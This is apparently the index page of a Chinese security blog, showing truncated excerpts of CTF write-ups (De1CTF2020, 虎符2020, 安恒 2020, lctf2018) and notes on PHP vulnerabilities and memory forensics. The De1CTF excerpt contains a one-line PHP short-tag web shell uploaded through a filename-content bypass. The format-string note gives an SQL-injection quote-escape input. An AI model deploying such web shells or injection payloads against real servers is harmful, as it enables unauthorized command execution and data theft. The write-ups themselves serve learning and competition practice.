JS-this指向
https://www.cnblogs.com/qdjianghao/p/10177360.html
De1CTF2020
Check in 抓包,随便上传了个马,发现存在内容黑名单 过滤了ph,尝试用短标签绕过 本地测试了下,这样的短标签可以执行任意系统命令,system也可以 非预期解1 于是我们去选择构造如下的payload上传,让他直接执行命令 最终读到flag De1ctf{cG1_cG1_cg1_857_857_cgll111ll11lll} 非预期解2 利用apache的服务器状态信息(默认关闭) .htaccess : 1SetHandler server-status 上传文件后,访问自己的目录就发现是apache的服务器状态信息,可以看到其他人的访问本网站的记录,可以利用次方法,可以白嫖flag。 其他payload 12345Content-Disposition: form-data; name="fileUpload"; filename="xx.txt"Content-Type: image/jpeg<?=`$_GET[1]`;xx.txt?1=cat...
虎符2020
babyupload 打开页面,发现给出了源码: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566 <?phperror_reporting(0);session_save_path("/var/babyctf/");session_start();require_once "/flag";highlight_file(__FILE__);if($_SESSION['username'] ==='admin'){ $filename='/var/babyctf/success.txt'; if(file_exists($filename)){ safe_delete($filename); ...
内存取证
123456789101112131415root@kali:~# volatility -f /root/桌面/mem.dump imageinfo //获取dump的版本Volatility Foundation Volatility Framework 2.6INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace...
PHP配置文件漏洞
https://www.cnblogs.com/wh4am1/p/6607837.html 123456<?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_contents('./config.php'); // 读文件$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file); // 过滤内容file_put_contents('./config.php', $file); // 写文件 config.php...
PHP格式化字符串漏洞
关键知识点 1234567<?php$input = addslashes("%1$' and 1=1#");$b = sprintf("AND b='%s'", $input);...$sql = sprintf("SELECT * FROM t WHERE a='%s' $b", 'admin');echo $sql; 通过fuzz得知,在php的格式化字符串中,%后的一个字符(除了'%')会被当作字符类型,而被吃掉,单引号',斜杠\也不例外。 如果能提前将%' and 1=1#拼接入sql语句,若存在SQLi过滤,单引号会被转义成\' 1select * from user where username = '%\' and 1=1#'; 然后这句sql语句如果继续进入格式化字符串,\会被%吃掉,'成功逃逸 123456<?php$sql = "select * from user where...
安恒4月赛2020
Web1 反序列化长度逃逸一般就是过滤的时机不对,在序列化之后再过滤很容易出现问题 https://www.php.cn/php-weizijiaocheng-437066.html 12345678910111213141516171819202122232425262728293031323334353637383940414243<?phpshow_source("index.php");function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);} function read($data) { return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);} class A{ public $username; public...
PHP-session上传进度
当浏览器向服务器端上传一个文件时,PHP将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中。然后,随着上传的进行,周期性的更新session中的信息。这样,浏览器端就可以使用Ajax周期性的请求一个服务器端脚本,由该脚本返回session中的进度信息;浏览器端的Javascript即可根据这些信息显示/更新进度条了。 php.ini需配置以下选项 123456session.upload_progress.enabled = "1"session.upload_progress.cleanup = "1"session.upload_progress.prefix = "upload_progress_"session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"session.upload_progress.freq =...
PHP-session反序列化
当浏览器向服务器端上传一个文件时,PHP将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中。然后,随着上传的进行,周期性的更新session中的信息。这样,浏览器端就可以使用Ajax周期性的请求一个服务器端脚本,由该脚本返回session中的进度信息;浏览器端的Javascript即可根据这些信息显示/更新进度条了。 php.ini需配置以下选项 123456session.upload_progress.enabled = "1"session.upload_progress.cleanup = "1"session.upload_progress.prefix = "upload_progress_"session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"session.upload_progress.freq =...
lctf2018
bestphp’s revenge https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html#_label1_0 session反序列化->soap(ssrf+crlf)->call_user_func激活soap类 有关session触发反序列化的资料 有关soapclient扩展反序列化的资料 index.php 123456789101112<?php highlight_file(__FILE__);$b = 'implode';call_user_func($_GET[f],$_POST);session_start();if(isset($_GET[name])){ $_SESSION[name] = $_GET[name];}var_dump($_SESSION);$a =...